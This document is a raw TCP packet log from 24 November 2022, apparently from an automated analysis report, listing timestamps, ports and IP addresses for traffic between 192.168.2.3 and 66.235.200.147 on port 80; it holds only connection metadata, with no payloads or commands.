Nov 24, 2022 12:19:59.752669096 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.752692938 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.752712011 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.752717972 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.752732038 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.752754927 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.752770901 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.752774954 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.752791882 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.752798080 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.752819061 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.752827883 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.752839088 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.752860069 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.752876043 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.752881050 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.752901077 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.752907991 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.752931118 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.752949953 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.752954960 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.752966881 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.752986908 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.752999067 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.753006935 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.753027916 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.753036022 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.753048897 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.753067017 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.753082991 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.753082991 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.753107071 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.753113031 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.753125906 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.753144979 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.753163099 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.753180981 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.753185034 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.753201962 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.753205061 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.753222942 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.753236055 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.753242970 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.753262043 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.753266096 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.753289938 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.753309011 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.753321886 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.753329039 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.753349066 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.753356934 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.753371000 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.753391027 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.753391981 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.753412962 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.753432035 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.753439903 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.753452063 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.753469944 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.753480911 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.753489017 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.753509045 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.753513098 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.753529072 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.753549099 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.753551006 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.753568888 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.753588915 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.753602028 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.753606081 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.753639936 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.755316973 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.755410910 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.755433083 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.755453110 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.755472898 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.755491972 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.755510092 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.755523920 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.755528927 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.755549908 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.755563021 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.755569935 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.755578041 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.755592108 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.755604029 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.755611897 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.755630970 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.755645037 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.755650997 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.755671978 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.755686045 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.755691051 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.755711079 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.755714893 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.755729914 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.755749941 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.755767107 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.755768061 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.755789042 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.755796909 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.755809069 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.755829096 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.755841017 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.755847931 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.755867958 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.755878925 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.755886078 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.755904913 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.755909920 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.755924940 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.755945921 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.755955935 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.755964994 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.755985975 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.755991936 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.756011963 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.756031990 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.756050110 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.756061077 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.756071091 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.756087065 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.756091118 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.756112099 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.756117105 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.756134033 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.756153107 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.756165981 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.756174088 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.756192923 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.756201982 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.756212950 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.756232023 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.756249905 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.756253958 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.756268978 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.756284952 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.756288052 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.756308079 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.756320953 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.756330013 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.756349087 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.756369114 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.756378889 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.756387949 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.756406069 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.756411076 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.756437063 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.771962881 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.771990061 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.772007942 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.772022009 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.772041082 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.772058964 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.772077084 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.772094965 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.772113085 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.772130966 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.772149086 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.772156954 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.772166967 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.772187948 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.772207022 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.772211075 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.772211075 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.772228003 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.772229910 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.772247076 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.772265911 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.772272110 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.772285938 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.772304058 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.772321939 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.772325039 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.772344112 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.772350073 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.772363901 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.772382975 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.772384882 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.772403002 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.772423029 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.772439957 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.772439957 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.772458076 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.772466898 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.772478104 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.772497892 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.772502899 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.772516966 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.772536993 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.772555113 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.772555113 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.772574902 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.772578001 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.772595882 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.772614956 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.772615910 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.772634983 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.772655010 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.772671938 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.772672892 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.772696018 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.772697926 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.772715092 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.772732973 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.772749901 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.772752047 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.772768974 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.772774935 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.772788048 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.772806883 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.772809029 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.772825956 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.772844076 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.772861004 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.772861958 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.772881031 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.772886038 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.772901058 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.772919893 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.772934914 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.772942066 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.772963047 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.773003101 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.773061991 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.773081064 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.773102045 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.773121119 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.773121119 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.773143053 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.773161888 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.773170948 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.773180962 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.773200989 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.773210049 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.773220062 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.773238897 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.773246050 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.773260117 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.773278952 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.773282051 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.773300886 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.773319960 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.773322105 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.773340940 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.773360968 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.773365021 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.773380041 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.773399115 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.773406982 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.773417950 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.773437977 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.773441076 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.773456097 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.773474932 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.773483038 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.773494005 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.773513079 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.773515940 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.773531914 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.773550987 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.773561001 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.773570061 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.773590088 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.773591042 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.773611069 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.773628950 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.773665905 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.773694038 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.774024010 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.774044037 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.774063110 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.774082899 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.774101973 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.774110079 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.774125099 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.774139881 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.774144888 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.774159908 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.774167061 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.774188042 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.774204016 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.774205923 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.774228096 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.774246931 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.774266005 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.774267912 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.774287939 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.774296999 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.774307966 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.774327993 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.774328947 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.774349928 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.774368048 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.774377108 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.774388075 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.774409056 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.774411917 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.774427891 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.774446964 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.774466038 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.774475098 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.774485111 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.774503946 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.774504900 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.774522066 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.774523973 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.774539948 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.774554014 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.774560928 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.774580956 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.774600983 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.774605036 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.774620056 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.774656057 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.774986982 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.775027037 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.775044918 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.775063038 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.775075912 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.775082111 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.775099993 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.775120974 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.775120974 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.775157928 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.775177956 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.775197983 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.775216103 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.775217056 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.775238037 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.775245905 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.775258064 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.775278091 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.775278091 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.775298119 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.775312901 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.775327921 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.775346994 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.775511026 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.775669098 CET	49708	80	192.168.2.3	66.235.200.147
